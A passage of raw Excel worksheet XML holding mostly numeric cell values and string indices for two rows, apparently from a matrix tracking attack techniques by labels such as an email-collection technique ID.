      <c r="OO31" s="120" t="s">
        <v>2603</v>
      </c>
      <c r="OP31" s="120">
        <v>1</v>
      </c>
      <c r="OQ31" s="464">
        <v>1</v>
      </c>
      <c r="OR31" s="120">
        <v>4</v>
      </c>
      <c r="OS31" s="120">
        <v>4</v>
      </c>
      <c r="OT31" s="120">
        <v>1</v>
      </c>
      <c r="OU31" s="120" t="s">
        <v>2604</v>
      </c>
      <c r="OV31" s="120">
        <v>1</v>
      </c>
      <c r="OW31" s="464">
        <v>1</v>
      </c>
      <c r="OX31" s="120">
        <v>0</v>
      </c>
      <c r="OY31" s="120">
        <v>0</v>
      </c>
      <c r="OZ31" s="120">
        <v>0</v>
      </c>
      <c r="PA31" s="120"/>
      <c r="PB31" s="120">
        <v>0</v>
      </c>
      <c r="PC31" s="464">
        <v>0</v>
      </c>
      <c r="PD31" s="120">
        <v>0</v>
      </c>
      <c r="PE31" s="120">
        <v>0</v>
      </c>
      <c r="PF31" s="120">
        <v>0</v>
      </c>
      <c r="PG31" s="120"/>
      <c r="PH31" s="120">
        <v>0</v>
      </c>
      <c r="PI31" s="464">
        <v>0</v>
      </c>
      <c r="PJ31" s="120">
        <v>0</v>
      </c>
      <c r="PK31" s="120">
        <v>0</v>
      </c>
      <c r="PL31" s="120">
        <v>0</v>
      </c>
      <c r="PM31" s="120"/>
      <c r="PN31" s="120">
        <v>0</v>
      </c>
      <c r="PO31" s="464">
        <v>0</v>
      </c>
      <c r="PP31" s="120">
        <v>0</v>
      </c>
      <c r="PQ31" s="120">
        <v>0</v>
      </c>
      <c r="PR31" s="120">
        <v>0</v>
      </c>
      <c r="PS31" s="120"/>
      <c r="PT31" s="120">
        <v>0</v>
      </c>
      <c r="PU31" s="464">
        <v>0</v>
      </c>
      <c r="PV31" s="120">
        <v>0</v>
      </c>
      <c r="PW31" s="120">
        <v>0</v>
      </c>
      <c r="PX31" s="120">
        <v>0</v>
      </c>
      <c r="PY31" s="120"/>
      <c r="PZ31" s="120">
        <v>0</v>
      </c>
      <c r="QA31" s="464">
        <v>0</v>
      </c>
      <c r="QB31" s="120">
        <v>5</v>
      </c>
      <c r="QC31" s="120">
        <v>5</v>
      </c>
      <c r="QD31" s="120">
        <v>1</v>
      </c>
      <c r="QE31" s="120" t="s">
        <v>2541</v>
      </c>
      <c r="QF31" s="120">
        <v>1</v>
      </c>
      <c r="QG31" s="464">
        <v>1</v>
      </c>
      <c r="QH31" s="120">
        <v>0</v>
      </c>
      <c r="QI31" s="120">
        <v>0</v>
      </c>
      <c r="QJ31" s="120">
        <v>0</v>
      </c>
      <c r="QK31" s="120"/>
      <c r="QL31" s="120">
        <v>0</v>
      </c>
      <c r="QM31" s="464">
        <v>0</v>
      </c>
      <c r="QN31" s="120">
        <v>0</v>
      </c>
      <c r="QO31" s="120">
        <v>0</v>
      </c>
      <c r="QP31" s="120">
        <v>0</v>
      </c>
      <c r="QQ31" s="120"/>
      <c r="QR31" s="120">
        <v>0</v>
      </c>
      <c r="QS31" s="464">
        <v>0</v>
      </c>
      <c r="QT31" s="184"/>
      <c r="QU31" s="184"/>
      <c r="QV31" s="184"/>
      <c r="QW31" s="184"/>
      <c r="QX31" s="184"/>
      <c r="QY31" s="184"/>
      <c r="QZ31" s="184"/>
      <c r="RA31" s="184"/>
      <c r="RB31" s="184"/>
      <c r="RC31" s="184"/>
      <c r="RD31" s="184"/>
      <c r="RE31" s="184"/>
      <c r="RF31" s="184"/>
      <c r="RG31" s="184"/>
      <c r="RH31" s="184"/>
      <c r="RI31" s="184"/>
      <c r="RJ31" s="184"/>
      <c r="RK31" s="184"/>
      <c r="RL31" s="184"/>
      <c r="RM31" s="184"/>
      <c r="RN31" s="184"/>
      <c r="RO31" s="184"/>
      <c r="RP31" s="184"/>
      <c r="RQ31" s="184"/>
      <c r="RR31" s="184"/>
      <c r="RS31" s="184"/>
      <c r="RT31" s="184"/>
      <c r="RU31" s="184"/>
      <c r="RV31" s="184"/>
      <c r="RW31" s="184"/>
      <c r="RX31" s="184"/>
      <c r="RY31" s="184"/>
      <c r="RZ31" s="184"/>
      <c r="SA31" s="184"/>
      <c r="SB31" s="184"/>
      <c r="SC31" s="184"/>
      <c r="SD31" s="184"/>
      <c r="SE31" s="184"/>
      <c r="SF31" s="184"/>
      <c r="SG31" s="184"/>
      <c r="SH31" s="184"/>
      <c r="SI31" s="184"/>
      <c r="SJ31" s="184"/>
      <c r="SK31" s="184"/>
      <c r="SL31" s="184"/>
      <c r="SM31" s="184"/>
      <c r="SN31" s="184"/>
      <c r="SO31" s="184"/>
      <c r="SP31" s="184"/>
      <c r="SQ31" s="184"/>
      <c r="SR31" s="184"/>
      <c r="SS31" s="184"/>
      <c r="ST31" s="184"/>
      <c r="SU31" s="184"/>
      <c r="SV31" s="184"/>
      <c r="SW31" s="184"/>
      <c r="SX31" s="184"/>
      <c r="SY31" s="184"/>
      <c r="SZ31" s="184"/>
      <c r="TA31" s="184"/>
      <c r="TB31" s="184"/>
      <c r="TC31" s="184"/>
      <c r="TD31" s="184"/>
      <c r="TE31" s="184"/>
      <c r="TF31" s="184"/>
      <c r="TG31" s="184"/>
      <c r="TH31" s="184"/>
      <c r="TI31" s="184"/>
      <c r="TJ31" s="184"/>
      <c r="TK31" s="184"/>
      <c r="TL31" s="184"/>
      <c r="TM31" s="184"/>
      <c r="TN31" s="184"/>
      <c r="TO31" s="184"/>
      <c r="TP31" s="184"/>
      <c r="TQ31" s="184"/>
      <c r="TR31" s="184"/>
      <c r="TS31" s="184"/>
      <c r="TT31" s="184"/>
      <c r="TU31" s="184"/>
      <c r="TV31" s="184"/>
      <c r="TW31" s="184"/>
      <c r="TX31" s="184"/>
      <c r="TY31" s="184"/>
      <c r="TZ31" s="184"/>
      <c r="UA31" s="184"/>
      <c r="UB31" s="184"/>
      <c r="UC31" s="184"/>
      <c r="UD31" s="184"/>
      <c r="UE31" s="184"/>
      <c r="UF31" s="184"/>
      <c r="UG31" s="184"/>
      <c r="UH31" s="184"/>
      <c r="UI31" s="184"/>
      <c r="UJ31" s="184"/>
      <c r="UK31" s="184"/>
      <c r="UL31" s="184"/>
      <c r="UM31" s="184"/>
      <c r="UN31" s="184"/>
      <c r="UO31" s="184"/>
      <c r="UP31" s="184"/>
      <c r="UQ31" s="184"/>
      <c r="UR31" s="184"/>
      <c r="US31" s="184"/>
      <c r="UT31" s="184"/>
      <c r="UU31" s="184"/>
      <c r="UV31" s="184"/>
      <c r="UW31" s="184"/>
      <c r="UX31" s="184"/>
      <c r="UY31" s="184"/>
      <c r="UZ31" s="184"/>
      <c r="VA31" s="184"/>
      <c r="VB31" s="184"/>
      <c r="VC31" s="184"/>
      <c r="VD31" s="184"/>
      <c r="VE31" s="184"/>
      <c r="VF31" s="184"/>
      <c r="VG31" s="184"/>
      <c r="VH31" s="184"/>
      <c r="VI31" s="184"/>
      <c r="VJ31" s="184"/>
      <c r="VK31" s="184"/>
      <c r="VL31" s="184"/>
      <c r="VM31" s="184"/>
      <c r="VN31" s="184"/>
      <c r="VO31" s="184"/>
      <c r="VP31" s="184"/>
      <c r="VQ31" s="184"/>
      <c r="VR31" s="184"/>
      <c r="VS31" s="184"/>
      <c r="VT31" s="184"/>
      <c r="VU31" s="184"/>
      <c r="VV31" s="184"/>
      <c r="VW31" s="184"/>
      <c r="VX31" s="184"/>
      <c r="VY31" s="184"/>
    </row>
    <row r="32" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A32" s="82" t="s">
        <v>30</v>
      </c>
      <c r="B32" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C32" s="83" t="s">
        <v>309</v>
      </c>
      <c r="D32" s="83" t="s">
        <v>68</v>
      </c>
      <c r="E32" s="83">
        <f t="shared" si="2"/>
        <v>26</v>
      </c>
      <c r="F32" s="83" t="s">
        <v>69</v>
      </c>
      <c r="G32" s="83" t="s">
        <v>1044</v>
      </c>
      <c r="H32" s="83" t="s">
        <v>1045</v>
      </c>
      <c r="I32" s="81" t="s">
        <v>1046</v>
      </c>
      <c r="J32" s="85" t="s">
        <v>827</v>
      </c>
      <c r="K32" s="81" t="s">
        <v>1047</v>
      </c>
      <c r="L32" s="81" t="s">
        <v>1048</v>
      </c>
      <c r="M32" s="378" t="s">
        <v>206</v>
      </c>
      <c r="N32" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O32" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P32" s="91"/>
      <c r="Q32" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R32" s="92" t="s">
        <v>1049</v>
      </c>
      <c r="S32" s="93" t="s">
        <v>843</v>
      </c>
      <c r="T32" s="92" t="s">
        <v>1050</v>
      </c>
      <c r="U32" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V32" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W32" s="96" t="s">
        <v>1051</v>
      </c>
      <c r="X32" s="97" t="s">
        <v>1052</v>
      </c>
      <c r="Y32" s="83" t="s">
        <v>1053</v>
      </c>
      <c r="Z32" s="98" t="s">
        <v>1054</v>
      </c>
      <c r="AA32" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB32" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC32" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD32" s="83"/>
      <c r="AE32" s="83"/>
      <c r="AF32" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG32" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH32" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI32" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ32" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK32" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL32" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM32" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN32" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO32" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP32" s="385" t="str">
        <f>M32&amp;"-frag"</f>
        <v>T1114.002-Email_collection_remote_email_collection-frag</v>
      </c>
      <c r="AQ32" s="358">
        <v>10</v>
      </c>
      <c r="AR32" s="100"/>
      <c r="AS32" s="100">
        <v>3</v>
      </c>
      <c r="AT32" s="100">
        <v>0</v>
      </c>
      <c r="AU32" s="100">
        <v>3</v>
      </c>
      <c r="AV32" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW32" s="100">
        <v>3</v>
      </c>
      <c r="AX32" s="100">
        <v>3</v>
      </c>
      <c r="AY32" s="100">
        <v>0</v>
      </c>
      <c r="AZ32" s="100">
        <v>3</v>
      </c>
      <c r="BA32" s="381"/>
      <c r="BB32" s="101">
        <v>7</v>
      </c>
      <c r="BC32" s="102" t="s">
        <v>3000</v>
      </c>
      <c r="BD32" s="102">
        <v>5</v>
      </c>
      <c r="BE32" s="103" t="s">
        <v>3001</v>
      </c>
      <c r="BF32" s="103">
        <v>2</v>
      </c>
      <c r="BG32" s="104">
        <v>5</v>
      </c>
      <c r="BH32" s="105">
        <v>19</v>
      </c>
      <c r="BI32" s="106" t="s">
        <v>1849</v>
      </c>
      <c r="BJ32" s="497">
        <v>4</v>
      </c>
      <c r="BK32" s="107" t="s">
        <v>1850</v>
      </c>
      <c r="BL32" s="107">
        <v>1</v>
      </c>
      <c r="BM32" s="108">
        <v>4</v>
      </c>
      <c r="BN32" s="109">
        <v>26</v>
      </c>
      <c r="BO32" s="110" t="s">
        <v>2002</v>
      </c>
      <c r="BP32" s="501">
        <v>9</v>
      </c>
      <c r="BQ32" s="111" t="s">
        <v>2003</v>
      </c>
      <c r="BR32" s="111">
        <v>3</v>
      </c>
      <c r="BS32" s="112">
        <v>5</v>
      </c>
      <c r="BT32" s="113">
        <v>16</v>
      </c>
      <c r="BU32" s="114" t="s">
        <v>3002</v>
      </c>
      <c r="BV32" s="503">
        <v>14</v>
      </c>
      <c r="BW32" s="115" t="s">
        <v>3003</v>
      </c>
      <c r="BX32" s="115">
        <v>6</v>
      </c>
      <c r="BY32" s="116">
        <v>9</v>
      </c>
      <c r="BZ32" s="250">
        <v>39</v>
      </c>
      <c r="CA32" s="251" t="s">
        <v>3004</v>
      </c>
      <c r="CB32" s="505">
        <v>22</v>
      </c>
      <c r="CC32" s="252" t="s">
        <v>3005</v>
      </c>
      <c r="CD32" s="252">
        <v>16</v>
      </c>
      <c r="CE32" s="253">
        <v>7</v>
      </c>
      <c r="CF32" s="101">
        <v>55</v>
      </c>
      <c r="CG32" s="102" t="s">
        <v>3006</v>
      </c>
      <c r="CH32" s="102">
        <v>36</v>
      </c>
      <c r="CI32" s="103" t="s">
        <v>3007</v>
      </c>
      <c r="CJ32" s="103">
        <v>22</v>
      </c>
      <c r="CK32" s="104">
        <v>9</v>
      </c>
      <c r="CL32" s="105">
        <v>0</v>
      </c>
      <c r="CM32" s="106">
        <v>0</v>
      </c>
      <c r="CN32" s="497">
        <v>0</v>
      </c>
      <c r="CO32" s="107">
        <v>0</v>
      </c>
      <c r="CP32" s="107">
        <v>0</v>
      </c>
      <c r="CQ32" s="108">
        <v>0</v>
      </c>
      <c r="CR32" s="109">
        <v>0</v>
      </c>
      <c r="CS32" s="110">
        <v>0</v>
      </c>
      <c r="CT32" s="501">
        <v>0</v>
      </c>
      <c r="CU32" s="111">
        <v>0</v>
      </c>
      <c r="CV32" s="111">
        <v>0</v>
      </c>
      <c r="CW32" s="112">
        <v>0</v>
      </c>
      <c r="CX32" s="113">
        <v>26</v>
      </c>
      <c r="CY32" s="114" t="s">
        <v>2002</v>
      </c>
      <c r="CZ32" s="503">
        <v>9</v>
      </c>
      <c r="DA32" s="115" t="s">
        <v>2003</v>
      </c>
      <c r="DB32" s="115">
        <v>3</v>
      </c>
      <c r="DC32" s="116">
        <v>5</v>
      </c>
      <c r="DD32" s="101">
        <v>0</v>
      </c>
      <c r="DE32" s="102">
        <v>0</v>
      </c>
      <c r="DF32" s="102">
        <v>0</v>
      </c>
      <c r="DG32" s="103">
        <v>0</v>
      </c>
      <c r="DH32" s="103">
        <v>0</v>
      </c>
      <c r="DI32" s="104">
        <v>0</v>
      </c>
      <c r="DJ32" s="105">
        <v>0</v>
      </c>
      <c r="DK32" s="106">
        <v>0</v>
      </c>
      <c r="DL32" s="497">
        <v>0</v>
      </c>
      <c r="DM32" s="107">
        <v>0</v>
      </c>
      <c r="DN32" s="107">
        <v>0</v>
      </c>
      <c r="DO32" s="108">
        <v>0</v>
      </c>
      <c r="DP32" s="109">
        <v>0</v>
      </c>
      <c r="DQ32" s="110">
        <v>0</v>
      </c>
      <c r="DR32" s="501">
        <v>0</v>
      </c>
      <c r="DS32" s="111">
        <v>0</v>
      </c>
      <c r="DT32" s="111">
        <v>0</v>
      </c>
      <c r="DU32" s="112">
        <v>0</v>
      </c>
      <c r="DV32" s="113">
        <v>9</v>
      </c>
      <c r="DW32" s="114" t="s">
        <v>3008</v>
      </c>
      <c r="DX32" s="503">
        <v>9</v>
      </c>
      <c r="DY32" s="115" t="s">
        <v>3009</v>
      </c>
      <c r="DZ32" s="115">
        <v>4</v>
      </c>
      <c r="EA32" s="116">
        <v>9</v>
      </c>
      <c r="EB32" s="250">
        <v>0</v>
      </c>
      <c r="EC32" s="251">
        <v>0</v>
      </c>
      <c r="ED32" s="505">
        <v>0</v>
      </c>
      <c r="EE32" s="252">
        <v>0</v>
      </c>
      <c r="EF32" s="252">
        <v>0</v>
      </c>
      <c r="EG32" s="253">
        <v>0</v>
      </c>
      <c r="EH32" s="101">
        <v>9</v>
      </c>
      <c r="EI32" s="102" t="s">
        <v>3008</v>
      </c>
      <c r="EJ32" s="102">
        <v>9</v>
      </c>
      <c r="EK32" s="103" t="s">
        <v>3009</v>
      </c>
      <c r="EL32" s="103">
        <v>4</v>
      </c>
      <c r="EM32" s="104">
        <v>9</v>
      </c>
      <c r="EN32" s="105">
        <v>0</v>
      </c>
      <c r="EO32" s="106">
        <v>0</v>
      </c>
      <c r="EP32" s="497">
        <v>0</v>
      </c>
      <c r="EQ32" s="107">
        <v>0</v>
      </c>
      <c r="ER32" s="107">
        <v>0</v>
      </c>
      <c r="ES32" s="108">
        <v>0</v>
      </c>
      <c r="ET32" s="109">
        <v>0</v>
      </c>
      <c r="EU32" s="110">
        <v>0</v>
      </c>
      <c r="EV32" s="501">
        <v>0</v>
      </c>
      <c r="EW32" s="111">
        <v>0</v>
      </c>
      <c r="EX32" s="111">
        <v>0</v>
      </c>
      <c r="EY32" s="112">
        <v>0</v>
      </c>
      <c r="EZ32" s="113">
        <v>0</v>
      </c>
      <c r="FA32" s="114">
        <v>0</v>
      </c>
      <c r="FB32" s="503">
        <v>0</v>
      </c>
      <c r="FC32" s="115">
        <v>0</v>
      </c>
      <c r="FD32" s="115">
        <v>0</v>
      </c>
      <c r="FE32" s="116">
        <v>0</v>
      </c>
      <c r="FF32" s="101">
        <v>7</v>
      </c>
      <c r="FG32" s="102" t="s">
        <v>3000</v>
      </c>
      <c r="FH32" s="102">
        <v>5</v>
      </c>
      <c r="FI32" s="103" t="s">
        <v>3001</v>
      </c>
      <c r="FJ32" s="103">
        <v>2</v>
      </c>
      <c r="FK32" s="104">
        <v>5</v>
      </c>
      <c r="FL32" s="105">
        <v>19</v>
      </c>
      <c r="FM32" s="106" t="s">
        <v>1849</v>
      </c>
      <c r="FN32" s="497">
        <v>4</v>
      </c>
      <c r="FO32" s="107" t="s">
        <v>1850</v>
      </c>
      <c r="FP32" s="107">
        <v>1</v>
      </c>
      <c r="FQ32" s="108">
        <v>4</v>
      </c>
      <c r="FR32" s="109">
        <v>26</v>
      </c>
      <c r="FS32" s="110" t="s">
        <v>2002</v>
      </c>
      <c r="FT32" s="501">
        <v>9</v>
      </c>
      <c r="FU32" s="111" t="s">
        <v>2003</v>
      </c>
      <c r="FV32" s="111">
        <v>3</v>
      </c>
      <c r="FW32" s="112">
        <v>5</v>
      </c>
      <c r="FX32" s="113">
        <v>7</v>
      </c>
      <c r="FY32" s="114" t="s">
        <v>3000</v>
      </c>
      <c r="FZ32" s="503">
        <v>5</v>
      </c>
      <c r="GA32" s="115" t="s">
        <v>3001</v>
      </c>
      <c r="GB32" s="115">
        <v>2</v>
      </c>
      <c r="GC32" s="116">
        <v>5</v>
      </c>
      <c r="GD32" s="250">
        <v>26</v>
      </c>
      <c r="GE32" s="251" t="s">
        <v>3010</v>
      </c>
      <c r="GF32" s="505">
        <v>9</v>
      </c>
      <c r="GG32" s="252" t="s">
        <v>3011</v>
      </c>
      <c r="GH32" s="252">
        <v>4</v>
      </c>
      <c r="GI32" s="253">
        <v>6</v>
      </c>
      <c r="GJ32" s="101">
        <v>33</v>
      </c>
      <c r="GK32" s="102" t="s">
        <v>3012</v>
      </c>
      <c r="GL32" s="102">
        <v>14</v>
      </c>
      <c r="GM32" s="103" t="s">
        <v>3013</v>
      </c>
      <c r="GN32" s="103">
        <v>6</v>
      </c>
      <c r="GO32" s="104">
        <v>7</v>
      </c>
      <c r="GP32" s="105">
        <v>0</v>
      </c>
      <c r="GQ32" s="106">
        <v>0</v>
      </c>
      <c r="GR32" s="497">
        <v>0</v>
      </c>
      <c r="GS32" s="107">
        <v>0</v>
      </c>
      <c r="GT32" s="107">
        <v>0</v>
      </c>
      <c r="GU32" s="108">
        <v>0</v>
      </c>
      <c r="GV32" s="109">
        <v>0</v>
      </c>
      <c r="GW32" s="110">
        <v>0</v>
      </c>
      <c r="GX32" s="501">
        <v>0</v>
      </c>
      <c r="GY32" s="111">
        <v>0</v>
      </c>
      <c r="GZ32" s="111">
        <v>0</v>
      </c>
      <c r="HA32" s="112">
        <v>0</v>
      </c>
      <c r="HB32" s="113">
        <v>26</v>
      </c>
      <c r="HC32" s="114" t="s">
        <v>2002</v>
      </c>
      <c r="HD32" s="503">
        <v>9</v>
      </c>
      <c r="HE32" s="115" t="s">
        <v>2003</v>
      </c>
      <c r="HF32" s="115">
        <v>3</v>
      </c>
      <c r="HG32" s="116">
        <v>5</v>
      </c>
      <c r="HH32" s="101">
        <v>0</v>
      </c>
      <c r="HI32" s="102">
        <v>0</v>
      </c>
      <c r="HJ32" s="102">
        <v>0</v>
      </c>
      <c r="HK32" s="103">
        <v>0</v>
      </c>
      <c r="HL32" s="103">
        <v>0</v>
      </c>
      <c r="HM32" s="104">
        <v>0</v>
      </c>
      <c r="HN32" s="105">
        <v>0</v>
      </c>
      <c r="HO32" s="106">
        <v>0</v>
      </c>
      <c r="HP32" s="497">
        <v>0</v>
      </c>
      <c r="HQ32" s="107">
        <v>0</v>
      </c>
      <c r="HR32" s="107">
        <v>0</v>
      </c>
      <c r="HS32" s="108">
        <v>0</v>
      </c>
      <c r="HT32" s="109">
        <v>0</v>
      </c>
      <c r="HU32" s="110">
        <v>0</v>
      </c>
      <c r="HV32" s="501">
        <v>0</v>
      </c>
      <c r="HW32" s="111">
        <v>0</v>
      </c>
      <c r="HX32" s="111">
        <v>0</v>
      </c>
      <c r="HY32" s="112">
        <v>0</v>
      </c>
      <c r="HZ32" s="113">
        <v>0</v>
      </c>
      <c r="IA32" s="114">
        <v>0</v>
      </c>
      <c r="IB32" s="503">
        <v>0</v>
      </c>
      <c r="IC32" s="115">
        <v>0</v>
      </c>
      <c r="ID32" s="115">
        <v>0</v>
      </c>
      <c r="IE32" s="116">
        <v>0</v>
      </c>
      <c r="IF32" s="250">
        <v>13</v>
      </c>
      <c r="IG32" s="251" t="s">
        <v>3014</v>
      </c>
      <c r="IH32" s="505">
        <v>13</v>
      </c>
      <c r="II32" s="252" t="s">
        <v>3015</v>
      </c>
      <c r="IJ32" s="252">
        <v>12</v>
      </c>
      <c r="IK32" s="253">
        <v>3</v>
      </c>
      <c r="IL32" s="101">
        <v>13</v>
      </c>
      <c r="IM32" s="102" t="s">
        <v>3014</v>
      </c>
      <c r="IN32" s="102">
        <v>13</v>
      </c>
      <c r="IO32" s="103" t="s">
        <v>3015</v>
      </c>
      <c r="IP32" s="103">
        <v>12</v>
      </c>
      <c r="IQ32" s="104">
        <v>3</v>
      </c>
      <c r="IR32" s="105">
        <v>0</v>
      </c>
      <c r="IS32" s="106">
        <v>0</v>
      </c>
      <c r="IT32" s="497">
        <v>0</v>
      </c>
      <c r="IU32" s="107">
        <v>0</v>
      </c>
      <c r="IV32" s="107">
        <v>0</v>
      </c>
      <c r="IW32" s="108">
        <v>0</v>
      </c>
      <c r="IX32" s="109">
        <v>0</v>
      </c>
      <c r="IY32" s="110">
        <v>0</v>
      </c>
      <c r="IZ32" s="501">
        <v>0</v>
      </c>
      <c r="JA32" s="111">
        <v>0</v>
      </c>
      <c r="JB32" s="111">
        <v>0</v>
      </c>
      <c r="JC32" s="112">
        <v>0</v>
      </c>
      <c r="JD32" s="113">
        <v>0</v>
      </c>
      <c r="JE32" s="114">
        <v>0</v>
      </c>
      <c r="JF32" s="503">
        <v>0</v>
      </c>
      <c r="JG32" s="115">
        <v>0</v>
      </c>
      <c r="JH32" s="115">
        <v>0</v>
      </c>
      <c r="JI32" s="116">
        <v>0</v>
      </c>
      <c r="JJ32" s="101">
        <v>0</v>
      </c>
      <c r="JK32" s="102">
        <v>0</v>
      </c>
      <c r="JL32" s="102">
        <v>0</v>
      </c>
      <c r="JM32" s="103">
        <v>0</v>
      </c>
      <c r="JN32" s="103">
        <v>0</v>
      </c>
      <c r="JO32" s="104">
        <v>0</v>
      </c>
      <c r="JP32" s="105">
        <v>0</v>
      </c>
      <c r="JQ32" s="106">
        <v>0</v>
      </c>
      <c r="JR32" s="497">
        <v>0</v>
      </c>
      <c r="JS32" s="107">
        <v>0</v>
      </c>
      <c r="JT32" s="107">
        <v>0</v>
      </c>
      <c r="JU32" s="108">
        <v>0</v>
      </c>
      <c r="JV32" s="109">
        <v>0</v>
      </c>
      <c r="JW32" s="110">
        <v>0</v>
      </c>
      <c r="JX32" s="501">
        <v>0</v>
      </c>
      <c r="JY32" s="111">
        <v>0</v>
      </c>
      <c r="JZ32" s="111">
        <v>0</v>
      </c>
      <c r="KA32" s="112">
        <v>0</v>
      </c>
      <c r="KB32" s="113">
        <v>0</v>
      </c>
      <c r="KC32" s="114">
        <v>0</v>
      </c>
      <c r="KD32" s="503">
        <v>0</v>
      </c>
      <c r="KE32" s="115">
        <v>0</v>
      </c>
      <c r="KF32" s="115">
        <v>0</v>
      </c>
      <c r="KG32" s="116">
        <v>0</v>
      </c>
      <c r="KH32" s="250">
        <v>0</v>
      </c>
      <c r="KI32" s="251">
        <v>0</v>
      </c>
      <c r="KJ32" s="505">
        <v>0</v>
      </c>
      <c r="KK32" s="252">
        <v>0</v>
      </c>
      <c r="KL32" s="252">
        <v>0</v>
      </c>
      <c r="KM32" s="253">
        <v>0</v>
      </c>
      <c r="KN32" s="101">
        <v>0</v>
      </c>
      <c r="KO32" s="102">
        <v>0</v>
      </c>
      <c r="KP32" s="102">
        <v>0</v>
      </c>
      <c r="KQ32" s="103">
        <v>0</v>
      </c>
      <c r="KR32" s="103">
        <v>0</v>
      </c>
      <c r="KS32" s="104">
        <v>0</v>
      </c>
      <c r="KT32" s="105">
        <v>0</v>
      </c>
      <c r="KU32" s="106">
        <v>0</v>
      </c>
      <c r="KV32" s="497">
        <v>0</v>
      </c>
      <c r="KW32" s="107">
        <v>0</v>
      </c>
      <c r="KX32" s="107">
        <v>0</v>
      </c>
      <c r="KY32" s="108">
        <v>0</v>
      </c>
      <c r="KZ32" s="109">
        <v>0</v>
      </c>
      <c r="LA32" s="110">
        <v>0</v>
      </c>
      <c r="LB32" s="501">
        <v>0</v>
      </c>
      <c r="LC32" s="111">
        <v>0</v>
      </c>
      <c r="LD32" s="111">
        <v>0</v>
      </c>
      <c r="LE32" s="112">
        <v>0</v>
      </c>
      <c r="LF32" s="113">
        <v>0</v>
      </c>
      <c r="LG32" s="114">
        <v>0</v>
      </c>
      <c r="LH32" s="503">
        <v>0</v>
      </c>
      <c r="LI32" s="115">
        <v>0</v>
      </c>
      <c r="LJ32" s="115">
        <v>0</v>
      </c>
      <c r="LK32" s="116">
        <v>0</v>
      </c>
      <c r="LL32" s="117">
        <v>19</v>
      </c>
      <c r="LM32" s="507">
        <v>13</v>
      </c>
      <c r="LN32" s="119">
        <v>3</v>
      </c>
      <c r="LO32" s="119">
        <v>4</v>
      </c>
      <c r="LP32" s="119">
        <v>9</v>
      </c>
      <c r="LQ32" s="119">
        <v>4</v>
      </c>
      <c r="LR32" s="119">
        <v>6</v>
      </c>
      <c r="LS32" s="119">
        <v>9</v>
      </c>
      <c r="LT32" s="382"/>
      <c r="LU32" s="117">
        <v>7</v>
      </c>
      <c r="LV32" s="118" t="s">
        <v>4197</v>
      </c>
      <c r="LW32" s="507">
        <v>4</v>
      </c>
      <c r="LX32" s="119" t="s">
        <v>2536</v>
      </c>
      <c r="LY32" s="119">
        <v>1</v>
      </c>
      <c r="LZ32" s="119">
        <v>4</v>
      </c>
      <c r="MA32" s="117">
        <v>5</v>
      </c>
      <c r="MB32" s="118" t="s">
        <v>4198</v>
      </c>
      <c r="MC32" s="507">
        <v>2</v>
      </c>
      <c r="MD32" s="119" t="s">
        <v>4199</v>
      </c>
      <c r="ME32" s="119">
        <v>2</v>
      </c>
      <c r="MF32" s="119">
        <v>1</v>
      </c>
      <c r="MG32" s="117">
        <v>0</v>
      </c>
      <c r="MH32" s="118">
        <v>0</v>
      </c>
      <c r="MI32" s="507">
        <v>0</v>
      </c>
      <c r="MJ32" s="119">
        <v>0</v>
      </c>
      <c r="MK32" s="119">
        <v>0</v>
      </c>
      <c r="ML32" s="119">
        <v>0</v>
      </c>
      <c r="MM32" s="117">
        <v>0</v>
      </c>
      <c r="MN32" s="118">
        <v>0</v>
      </c>
      <c r="MO32" s="507">
        <v>0</v>
      </c>
      <c r="MP32" s="119">
        <v>0</v>
      </c>
      <c r="MQ32" s="119">
        <v>0</v>
      </c>
      <c r="MR32" s="119">
        <v>0</v>
      </c>
      <c r="MS32" s="117">
        <v>0</v>
      </c>
      <c r="MT32" s="118">
        <v>0</v>
      </c>
      <c r="MU32" s="507">
        <v>0</v>
      </c>
      <c r="MV32" s="119">
        <v>0</v>
      </c>
      <c r="MW32" s="119">
        <v>0</v>
      </c>
      <c r="MX32" s="119">
        <v>0</v>
      </c>
      <c r="MY32" s="117">
        <v>0</v>
      </c>
      <c r="MZ32" s="118">
        <v>0</v>
      </c>
      <c r="NA32" s="507">
        <v>0</v>
      </c>
      <c r="NB32" s="119">
        <v>0</v>
      </c>
      <c r="NC32" s="119">
        <v>0</v>
      </c>
      <c r="ND32" s="119">
        <v>0</v>
      </c>
      <c r="NE32" s="117">
        <v>0</v>
      </c>
      <c r="NF32" s="118">
        <v>0</v>
      </c>
      <c r="NG32" s="507">
        <v>0</v>
      </c>
      <c r="NH32" s="119">
        <v>0</v>
      </c>
      <c r="NI32" s="119">
        <v>0</v>
      </c>
      <c r="NJ32" s="119">
        <v>0</v>
      </c>
      <c r="NK32" s="117">
        <v>4</v>
      </c>
      <c r="NL32" s="118" t="s">
        <v>4185</v>
      </c>
      <c r="NM32" s="507">
        <v>4</v>
      </c>
      <c r="NN32" s="119" t="s">
        <v>2638</v>
      </c>
      <c r="NO32" s="119">
        <v>1</v>
      </c>
      <c r="NP32" s="119">
        <v>4</v>
      </c>
      <c r="NQ32" s="117">
        <v>0</v>
      </c>
      <c r="NR32" s="118">
        <v>0</v>
      </c>
      <c r="NS32" s="507">
        <v>0</v>
      </c>
      <c r="NT32" s="119">
        <v>0</v>
      </c>
      <c r="NU32" s="119">
        <v>0</v>
      </c>
      <c r="NV32" s="119">
        <v>0</v>
      </c>
      <c r="NW32" s="117">
